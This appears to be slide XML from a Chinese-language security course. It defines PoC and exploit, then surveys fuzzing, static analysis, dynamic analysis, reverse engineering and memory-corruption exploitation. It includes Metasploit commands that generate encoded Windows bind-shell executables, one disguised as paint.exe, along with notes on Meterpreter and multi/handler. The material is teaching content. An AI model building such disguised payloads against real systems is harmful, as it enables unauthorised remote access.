            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>，中文“概念验证”，常指一段漏洞证明的代码。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Exp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>，全称”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
              <a:t>Exploit”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>，中文“利用”，指利用系统漏洞进行攻击的动作。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378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Executable Files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# msfpayload windows/shell_bind_tcp LPORT=2222 X &gt; msf.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Created by msfpayload (http://www.metasploit.com).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Payload: windows/shell_bind_tcp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Length: 341</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Options: {"LPORT"=&gt;"2222"}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t># file msf.exe </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>msf.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit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4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Encode Executables -1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# msfpayload windows/shell_bind_tcp LPORT=2222 R | msfencode -t exe -o msf2.exe -b "\x00\xff\x0a\x0d\x1a"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>[*] x86/shikata_ga_nai succeeded with size 368 (iteration=1)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t># file msf2.exe </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>msf2.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit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1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Encode Executables -2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# msfvenom -p windows/shell_bind_tcp -f exe -b "\x00\xff" -e x86/shikata_ga_na -i 2 &gt; paint.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t># file paint.exe </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>paint.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit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multi/handler Exploit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Generic Payload Handler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Supports Windows, Linux, Solaris, Unix, OSX, BSD, PHP, and Java</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Useful with Client-Side Attacks (waiting for a payload to connect)!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>msf &gt; use exploit/multi/handler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Meterpreter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 advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It communicates over the stager socket and provides a comprehensive client-side Ruby API. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Lots of great features (we’ll see them shortly)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Originally written by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>skape</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> 2.x.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The server portion is implemented in plain C and is now compiled with MSVC, making it somewhat portable.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524000"/>
            <a:ext cx="804672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4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latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>4.4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>软件漏洞挖掘技术及</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr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基于源代码的静态分析</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>静态分析</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>工具</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>动态分析</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
              <a:t>Fuzzing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>测试</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>二进制</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>逆向分析</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>基于补丁对比的逆向分析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48333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b="1" dirty="0"/>
              <a:t>基于源代码的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>静态分析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 smtClean="0"/>
              <a:t>基于源代码，从程序逻辑角度寻找漏洞。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1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b="1" dirty="0"/>
              <a:t>词法和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>语法分析</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1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b="1" dirty="0"/>
              <a:t>图形化</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>分析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zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>（程序流、数据流和程序依赖图）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1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b="1" dirty="0" smtClean="0"/>
              <a:t>静态切片</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>抽象解释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132202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b="1" dirty="0"/>
              <a:t>静态分析</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>工具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/>
              <a:t>LCLint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
              <a:t>—</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>利用规范检测源代码（缓冲区溢出）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
              <a:t>ARCHER—</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>静态自动查找内存访问错误</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
              <a:t>CSSV—</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>分析源代码中的缓冲区溢出</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
              <a:t>ITS4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t> —</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>开源</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>++</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>静态代码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>分析工具：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err="1"/>
              <a:t>cppcheck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coverity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>clang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/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pclint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>)</a:t>
            </a:r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8931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b="1" dirty="0" smtClean="0"/>
              <a:t>动态分析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程序动态运行时分析（内存、流程和效率）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>植入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>技术（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>修改程序</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>收集运行时程序信息）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>部分</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>求值（分析特殊值）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/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切片</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean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36189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b="1" dirty="0"/>
              <a:t>Fuzzing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1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/>
              <a:t>Fuzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>技术的思想就是利用“暴力”来实现对目标程序的自动化测试，然后监视检查其最后的结果，如果符合某种情况就认为程序可能存在某种漏洞或者问题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en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
              <a:t>Fuzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>的测试用例往往是带有攻击性的畸形数据，用以触发各种类型的漏洞。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>Fuzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>测试往往可以触发一个缓存区溢出漏洞，但却不能实现有效的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>测试人员需要实时地捕捉目标程序抛出的异常，发生的崩溃和寄存器等信息，综合判断这些错误是不是真正的可利用漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean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42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u"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>例子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>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>想象自己是一个特工，你的目标是监控一个重要的人，有一天你怀疑目标家里的窗子可能没有关，于是你上前推了推，结果推开了，这是一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>PoC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，于是你回去了。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第二天的渗透计划，你通过同样的漏洞渗透进了它家，仔细查看了所有的重要文件，离开时还安装了一个隐蔽的窃听器，这一天你所做的就是一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Exp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>你在他家所做的就是不同的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，就把窃听器当作</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>吧！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4483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u"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>文件类型漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>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  一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>file fuzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>工具通常包括以下几个步骤：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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  以一个正常的文件模版作为基础，按照一定规则产生一批畸形文件。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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  将畸形文件逐一送入软件进行解析，并监视软件是否会抛出异常。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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  记录软件产生的异常信息，如寄存器状态，栈状态。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p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  用日志或其他</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>UI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>形式向测试人员展示异常信息，以进一步鉴定这些错误是否能被利用。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0050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u"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>Web Fuzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>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      测试方法：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  设置目标环境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  输入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  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>GET  POST HEAD  PUT  DELETE TRACE  CONNECT  OPTIONS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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>请求</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>URL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5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>异常检测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767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u"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>FTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>挖掘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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>FTPfuzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>是专门用来测试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>FTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>协议安全的工具，它的基本原理就是通过对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>FTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>协议中的命令及命令参数进行脏数据替换，构造畸形的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>FTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>命令并发送给被测试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>FTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>服务程序。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>在程序崩溃时我们也可以用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1"/>
              <a:t>ollydbg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>等程序进行调试，来发现更详细的错误信息帮助我们分析程序的漏洞。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3878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b="1" dirty="0"/>
              <a:t>二进制逆向</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1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方法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>程序流程逆向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数据格式逆向</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>知识</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>：汇编语言，编译器原理和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
              <a:t>OS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>机理</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>技术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/>
              <a:t>输入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>追踪测试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静态分析 （</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
              <a:t>IDA  pro ,RCE,WDASM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/>
              <a:t>动态调试（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>OD,gdb,windbg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4611627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zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>基于补丁对比的逆向</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>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基于指令相似性的图形化分析 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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>同构图</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>结构化二进制比较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   指令相似性、逻辑结构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191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b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>Exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>利用技术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修改内存变量</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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修改代码逻辑</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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+mn-ea"/>
              </a:rPr>
              <a:t>修改函数返回</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>地址</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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修改函数指针</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>攻击异常处理</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>机制</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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+mn-ea"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>发生异常时，系统把</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>当异常处理</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>函数。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0" smtClean="0">
              <a:latin typeface="+mn-ea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b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>修改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>PEB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>线程同步函数入口地址</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>函数退出时，调用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
